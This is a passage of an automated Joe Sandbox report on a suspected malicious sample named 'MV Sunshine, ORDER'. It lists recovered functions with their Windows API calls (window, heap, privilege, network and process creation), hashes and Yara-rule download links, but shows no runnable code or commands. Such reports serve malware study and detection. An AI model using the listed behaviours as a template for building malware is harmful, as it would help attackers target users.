Instruction Fuzzy Hash: C731EF3160064AAFDB21CF64CA44BFB7BAAFF41320F154429F854871A0EB39E851DB90

Function 00A05175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00A05189

Part of subcall function 009E387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 009E3897
Part of subcall function 009E387D: GetCurrentThreadId.KERNEL32 ref: 009E389E
Part of subcall function 009E387D: AttachThreadInput.USER32(00000000,?,009E52A7), ref: 009E38A5

GetCaretPos.USER32(?), ref: 00A0519A
ClientToScreen.USER32(00000000,?), ref: 00A051D5
GetForegroundWindow.USER32 ref: 00A051DB

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: fa7801b569ec8bd72af93a10d495590eaecf14c4f58b1a80903bd76d04f70b78
Instruction ID: e3a511ecdafcdecb32886faa9d37a50e380ed6a2626ca2c0cc56d3d78708e60b
Opcode Fuzzy Hash: fa7801b569ec8bd72af93a10d495590eaecf14c4f58b1a80903bd76d04f70b78
Instruction Fuzzy Hash: 66310C71D00108AFDB14EFA5C985AEFB7F9EF98304F14406AE816E7251EA759E05CBA0

Function 00A0C788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623

GetCursorPos.USER32(?), ref: 00A0C7C2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,009BBBFB,?,?,?,?,?), ref: 00A0C7D7
GetCursorPos.USER32(?), ref: 00A0C824
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,009BBBFB,?,?,?), ref: 00A0C85E

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 5041640192d4dbfa336ae80be0c0065b2610f1a661aeffcff7cf8ea2eae190ec
Instruction ID: 65df30f34fd3071a97d05c8ba36d7e6038b5c7cb34ee3cd1d635bbb557bbabcf
Opcode Fuzzy Hash: 5041640192d4dbfa336ae80be0c0065b2610f1a661aeffcff7cf8ea2eae190ec
Instruction Fuzzy Hash: 9031D83550001CAFCB25CF98DC98EEA7BB5EF4A320F044165F905972A1D7315D51DF64

Function 009D8B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009D8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 009D8669
Part of subcall function 009D8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 009D8673
Part of subcall function 009D8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009D8682
Part of subcall function 009D8652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 009D8689
Part of subcall function 009D8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009D869F

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 009D8BEB
_memcmp.LIBCMT ref: 009D8C0E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 009D8C44
HeapFree.KERNEL32(00000000), ref: 009D8C4B

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: fb4ce0dbc5c18491027392182528ab06ee8b16890ba4cdba8991987c421806de
Instruction ID: 79901ee3811984974f3c1078bd847dfe5f53337f60b93752c03476351a3149b1
Opcode Fuzzy Hash: fb4ce0dbc5c18491027392182528ab06ee8b16890ba4cdba8991987c421806de
Instruction Fuzzy Hash: A8218171E51209EFDB10DFA4C945BEEB7B8EF44354F14805AE554A7341EB31AE06CB60

Function 009A0BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 009A0BF2

Part of subcall function 00985B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,009E7B20,?,?,00000000), ref: 00985B8C
Part of subcall function 00985B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,009E7B20,?,?,00000000,?,?), ref: 00985BB0

_fprintf.LIBCMT ref: 009A0C29
OutputDebugStringW.KERNEL32(?), ref: 009D6331

Part of subcall function 009A4CDA: _flsall.LIBCMT ref: 009A4CF3

__setmode.LIBCMT ref: 009A0C5E

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 606081b25a7c7f3ea6c87172def86c3203c4ed12a6c5ec22bde000214d6daa59
Instruction ID: 07b189023f1938074d5d2991750824d755be973cc287e22d88c421de4e3df164
Opcode Fuzzy Hash: 606081b25a7c7f3ea6c87172def86c3203c4ed12a6c5ec22bde000214d6daa59
Instruction Fuzzy Hash: 6111E4329042087FCB05B7B8AC47ABEBB6D9FC6320F14411AF20497292DEA55D9687D5

Function 009F1A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009F1A97

Part of subcall function 009F1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009F1B40
Part of subcall function 009F1B21: InternetCloseHandle.WININET(00000000), ref: 009F1BDD

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 4cd5aed8d13367d58fc4c3b2098e8659fa6df8da836f1bf9d6d6f559dcdaedd2
Instruction ID: 6ce24d5701157125a71590e5af4ac146ac31e82dcabb96724d539d3dc65744d9
Opcode Fuzzy Hash: 4cd5aed8d13367d58fc4c3b2098e8659fa6df8da836f1bf9d6d6f559dcdaedd2
Instruction Fuzzy Hash: 2C21A135200609FFDB269F608C01FBBB7ADFF84701F10041AFB11A6661EB71E8129BA1

Function 009DE1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 009DF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,009DE1C4,?,?,?,009DEFB7,00000000,000000EF,00000119,?,?), ref: 009DF5BC
Part of subcall function 009DF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 009DF5E2
Part of subcall function 009DF5AD: lstrcmpiW.KERNEL32(00000000,?,009DE1C4,?,?,?,009DEFB7,00000000,000000EF,00000119,?,?), ref: 009DF613

lstrlenW.KERNEL32(?,00000002,?,?,?,?,009DEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 009DE1DD
lstrcpyW.KERNEL32(00000000,?), ref: 009DE203
lstrcmpiW.KERNEL32(00000002,cdecl,?,009DEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 009DE237

Strings

cdecl, xrefs: 009DE22E

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 82092eb6ded5b243ab7f8eb970aae067f580282cd7dc66ee75c1cad2e0ddb14d
Instruction ID: 1b966deecf331fc089f57353a18e7ea87d40bc7f0bfb7b61fd467dd87ef66128
Opcode Fuzzy Hash: 82092eb6ded5b243ab7f8eb970aae067f580282cd7dc66ee75c1cad2e0ddb14d
Instruction Fuzzy Hash: F8118E36240345EFCB25AF64DC45A7A77BCFF85350B40812BF926CB260EB71A85297A0

Function 009B5332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 009B5351

Part of subcall function 009A594C: __FF_MSGBANNER.LIBCMT ref: 009A5963
Part of subcall function 009A594C: __NMSG_WRITE.LIBCMT ref: 009A596A
Part of subcall function 009A594C: RtlAllocateHeap.NTDLL(015A0000,00000000,00000001,00000000,?,?,?,009A1013,?), ref: 009A598F

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: b26b04ece977db89bb2e8f84a9c64cbd93c93b6755e93b582dcfbc50f86a367e
Instruction ID: 54673462a9d80a5309181e2d2873ee1364fcc400c435bef0787c1610ee9f2c4c
Opcode Fuzzy Hash: b26b04ece977db89bb2e8f84a9c64cbd93c93b6755e93b582dcfbc50f86a367e
Instruction Fuzzy Hash: 1311E772904A19EFCB313F74AD0579E37D85F563B0B214429F904AA291DFB5894197D0

Function 00984531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00984560

Part of subcall function 0098410D: _memset.LIBCMT ref: 0098418D
Part of subcall function 0098410D: _wcscpy.LIBCMT ref: 009841E1
Part of subcall function 0098410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 009841F1

KillTimer.USER32(?,00000001,?,?), ref: 009845B5
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 009845C4
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 009BD6CE

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: d6c274983f1d48ff3a714af8fe0915c0dbce1443289bb9eae8f0f2606e415947
Instruction ID: 47ae4daec5c8b3935bda94cd289c46a7cde388553afd89f66bb1f206c8d5ed3c
Opcode Fuzzy Hash: d6c274983f1d48ff3a714af8fe0915c0dbce1443289bb9eae8f0f2606e415947
Instruction Fuzzy Hash: 7D213B70905788EFEB32DB64CC45BEBBBEC9F01318F04009EE69E96241D7B51A85CB51

Function 009F667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00985B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,009E7B20,?,?,00000000), ref: 00985B8C
Part of subcall function 00985B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,009E7B20,?,?,00000000,?,?), ref: 00985BB0

gethostbyname.WSOCK32(?,?,?), ref: 009F66AC
WSAGetLastError.WSOCK32(00000000), ref: 009F66B7
_memmove.LIBCMT ref: 009F66E4
inet_ntoa.WSOCK32(?), ref: 009F66EF

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: a519910be8515fac781123cf1c8463ce88dd83edc6ff28bcedd34be5d204910a
Instruction ID: c4f8b2d6e5299d9a917e7efc02eb2d06f5bb1897ac534f5a2757046693003925
Opcode Fuzzy Hash: a519910be8515fac781123cf1c8463ce88dd83edc6ff28bcedd34be5d204910a
Instruction Fuzzy Hash: CE112E35500509AFCB04FBA4DD86EEEB7B8BF94310B148065F506A7261DF30AE09CBA1

Function 009D9023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 009D9043
SendMessageW.USER32(?,000000C9,?,00000000), ref: 009D9055
SendMessageW.USER32(?,000000C9,?,00000000), ref: 009D906B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 009D9086

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 9511a8538d0606709b06c4e03c96d31bacd142277a9474926f979224d69be8d7
Instruction ID: 479d7fd1098e5ff1bad317bdf234b790cae376e77ca075942f5122a724377bf0
Opcode Fuzzy Hash: 9511a8538d0606709b06c4e03c96d31bacd142277a9474926f979224d69be8d7
Instruction Fuzzy Hash: 17115E79941218FFDB10EFA5CC84F9DBB78FB48310F204096E904B7250D6726E11DB90

Function 00981290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623

DefDlgProcW.USER32(?,00000020,?), ref: 009812D8
GetClientRect.USER32(?,?), ref: 009BB84B
GetCursorPos.USER32(?), ref: 009BB855
ScreenToClient.USER32(?,?), ref: 009BB860

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 384ba36335113bb4a5361f5fc65d58520d42e6cbd9c2bb2e36e640239dcbce75
Instruction ID: 3bde4de598f28cc818e495222050f9c77d83837ef41fa869d31643812e9765e7
Opcode Fuzzy Hash: 384ba36335113bb4a5361f5fc65d58520d42e6cbd9c2bb2e36e640239dcbce75
Instruction Fuzzy Hash: 3F110639A0011EAFCB10EFA8D8859EE77BCEB46311F104456F921E7251D730BA538BA5

Function 009E1652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,009E01FD,?,009E1250,?,00008000), ref: 009E166F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,009E01FD,?,009E1250,?,00008000), ref: 009E1694
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,009E01FD,?,009E1250,?,00008000), ref: 009E169E
Sleep.KERNEL32(?,?,?,?,?,?,?,009E01FD,?,009E1250,?,00008000), ref: 009E16D1

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 87a1f453eb373b2bfb0840c81da69d0a9cbd617cd715b1d3521bfe8d5bd4efca
Instruction ID: 846fd7693b4a37364720ea6a17dffd6ddfa8e550df6f7fda4cddeaeb4d4bf43e
Opcode Fuzzy Hash: 87a1f453eb373b2bfb0840c81da69d0a9cbd617cd715b1d3521bfe8d5bd4efca
Instruction Fuzzy Hash: E3113631C0051DEBCF01AFA6D888AEEBB78FF09B41F044559EA44B6240CB3059618BD6

Function 009B7207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 009B722B

Part of subcall function 009B7912: __fltout2.LIBCMT ref: 009B793B

__cftog_l.LIBCMT ref: 009B7251
__cftoe_l.LIBCMT ref: 009B7283

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 876ff9151c26e2435fbff5b288ee71000dde801e1d94b9ac7da693a5c4287efd
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 1E01403604414ABBCF125EC4CD418EE7F66BF99361F598615FA2868031D237C9B1AB81

Function 00A0B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00A0B59E
ScreenToClient.USER32(?,?), ref: 00A0B5B6
ScreenToClient.USER32(?,?), ref: 00A0B5DA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A0B5F5

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 13014001c97a64173334ccacddc3096b7c71f2766e287ff7b3ef107994e71587
Instruction ID: 3f1fc7fec7f3e97baebd4e4c176a321219543a7fe668c3d42a56735b3b4786ce
Opcode Fuzzy Hash: 13014001c97a64173334ccacddc3096b7c71f2766e287ff7b3ef107994e71587
Instruction Fuzzy Hash: 831166B5D0024DEFDB11CF99D8849EEFBB9FB08310F104166E915E3620D735AA618F50

Function 00A0B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A0B8FE
_memset.LIBCMT ref: 00A0B90D
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00A47F20,00A47F64), ref: 00A0B93C
CloseHandle.KERNEL32 ref: 00A0B94E

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 1ec2156d620cfb0b4798bdd553b52db6a6d296e01956239b9744183c530c369c
Instruction ID: 30f5e3105e1af22040879dbd557345ba643ffdc6e62a94649d33e3a9823a274d
Opcode Fuzzy Hash: 1ec2156d620cfb0b4798bdd553b52db6a6d296e01956239b9744183c530c369c
Instruction Fuzzy Hash: 6FF05EBA5443547FE210ABA1AC05FBF7A5CEB4A754F004420BB08E9292E7724D06C7A9

Function 009E6E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 009E6E88

Part of subcall function 009E794E: _memset.LIBCMT ref: 009E7983

_memmove.LIBCMT ref: 009E6EAB
_memset.LIBCMT ref: 009E6EB8
LeaveCriticalSection.KERNEL32(?), ref: 009E6EC8

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: bebc14c5579d9e803ada6ea2af5648da92cef2790f33e22b9056af89356e205d
Instruction ID: e534976ba7c04b74e9281d8205ee376d9ea12b0d9a91750635d85407cebfee6e
Opcode Fuzzy Hash: bebc14c5579d9e803ada6ea2af5648da92cef2790f33e22b9056af89356e205d
Instruction Fuzzy Hash: E5F0543A100214ABCF116F95DC85B8AFB29EF89320F04C061FE085E217C731E912CBB5

Function 00A0C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 009812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0098134D
Part of subcall function 009812F3: SelectObject.GDI32(?,00000000), ref: 0098135C
Part of subcall function 009812F3: BeginPath.GDI32(?), ref: 00981373
